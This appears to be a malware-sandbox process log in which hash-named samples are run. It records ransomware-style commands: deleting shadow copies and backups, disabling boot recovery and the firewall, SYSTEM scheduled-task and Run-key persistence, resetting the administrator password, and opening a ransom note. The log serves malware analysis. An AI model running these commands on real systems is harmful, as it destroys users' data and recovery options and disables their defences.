"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=896,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\00acf5d0db7ef50140dae7a3482d9db80704ec98670bd1607e76c99382a4888c\" -ad -an -ai#7zMap24245:190:7zEvent14566

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3460,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2948,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7064,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4880,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\" -ad -an -ai#7zMap8206:190:7zEvent11735

C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe

"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"

C:\Windows\system32\net.exe

"net" session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\README-7ILxnOHKLf.md

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3236,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=5212,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\" -ad -an -ai#7zMap295:190:7zEvent31045

C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe

"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\winlogon.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\winlogon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2osrakf2\2osrakf2.cmdline"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F

C:\ProgramData\winlogon.exe

C:\ProgramData\winlogon.exe

C:\Windows\winlogon.exe

C:\Windows\winlogon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1C6.tmp" "c:\ProgramData\CSC8BF11E4749A64B498E688F446F4116AB.TMP"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Restore-My-Files.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5716,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=6636,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\" -ad -an -ai#7zMap21156:190:7zEvent32297

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6620,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat" "

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\net.exe

net user administrator 4217

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator 4217

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Tsuchigumo.bat /d "C:\Windows\system32\Tsuchigumo.bat" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Control Panel\Desktop" /v Wallpaper /f

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27100 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {cf100be8-2294-4b67-924c-1a28b4bad1f8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2456 -prefsLen 27136 -prefMapHandle 2460 -prefMapSize 270279 -ipcHandle 2352 -initialChannelId {ea6a6bb9-2061-4fa0-81b9-96aa9f2d07b6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 27277 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {8cb57d87-1612-4d70-9299-0c7c3e2dd7b0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27277 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {934fac5d-d6b9-4071-9951-1037fe04c929} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4516 -prefsLen 34776 -prefMapHandle 4520 -prefMapSize 270279 -jsInitHandle 4524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3104 -initialChannelId {6a3c3fc0-959c-4382-8432-5b332968fe16} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4996 -prefsLen 35013 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 5008 -initialChannelId {9646553d-9121-4fe2-8d04-e043c3e815c8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 32952 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 2744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4088 -initialChannelId {093b4033-a523-441b-bd2f-0876a43d0606} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4092 -prefsLen 32952 -prefMapHandle 3064 -prefMapSize 270279 -jsInitHandle 3208 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {8e7b1b81-d775-44bc-85e3-decf504334d0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5680 -prefsLen 32952 -prefMapHandle 5684 -prefMapSize 270279 -jsInitHandle 5688 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3064 -initialChannelId {0a844bbe-c5fc-4dcf-99a9-dadc3204b4b2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5840 -prefsLen 32952 -prefMapHandle 5844 -prefMapSize 270279 -jsInitHandle 5848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5856 -initialChannelId {9ae096be-d918-4601-9f32-14ee8fb92ef0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 32952 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5916 -initialChannelId {78b4221d-c8fb-4301-99ea-3711501afe2a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6088 -prefsLen 32952 -prefMapHandle 6092 -prefMapSize 270279 -jsInitHandle 6096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6104 -initialChannelId {82a4c713-8ca8-421f-81fb-6cfbc8e4de91} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6300 -prefsLen 32952 -prefMapHandle 6304 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6316 -initialChannelId {4599cb2d-c725-4e90-8eaa-9f6f4d11974b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6488 -prefsLen 32952 -prefMapHandle 6492 -prefMapSize 270279 -jsInitHandle 6496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6504 -initialChannelId {59312b7a-b589-47f2-b759-c7b0e5224fd2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6676 -prefsLen 32952 -prefMapHandle 6680 -prefMapSize 270279 -jsInitHandle 6684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6692 -initialChannelId {afb744f3-a5cd-4a76-a2ea-cd3c60ca72e3} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6864 -prefsLen 32952 -prefMapHandle 6868 -prefMapSize 270279 -jsInitHandle 6872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6880 -initialChannelId {63085a67-25bf-47c0-b959-7d3e63cd6a8d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7076 -prefsLen 32952 -prefMapHandle 7080 -prefMapSize 270279 -jsInitHandle 7084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7088 -initialChannelId {c081b01e-9395-405b-b414-c81d68a21da6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 17 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7284 -prefsLen 32952 -prefMapHandle 7288 -prefMapSize 270279 -jsInitHandle 7292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7300 -initialChannelId {74a5be6f-7089-4dd8-a793-e7bd280996e6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 18 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7328 -prefsLen 32952 -prefMapHandle 7316 -prefMapSize 270279 -jsInitHandle 7416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7488 -initialChannelId {d9558668-c643-455b-a073-305d17cf2027} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 19 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7660 -prefsLen 32952 -prefMapHandle 7664 -prefMapSize 270279 -jsInitHandle 7668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7676 -initialChannelId {91721b9e-3c1d-4f9d-b530-972ac4cf62c9} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 20 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7848 -prefsLen 32952 -prefMapHandle 7852 -prefMapSize 270279 -jsInitHandle 7856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7864 -initialChannelId {68c2e1b8-cdb2-40c0-80a8-3fbd3b9fe732} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 21 tab

C:\Program Files\Mozilla Firefox\firefox.exe

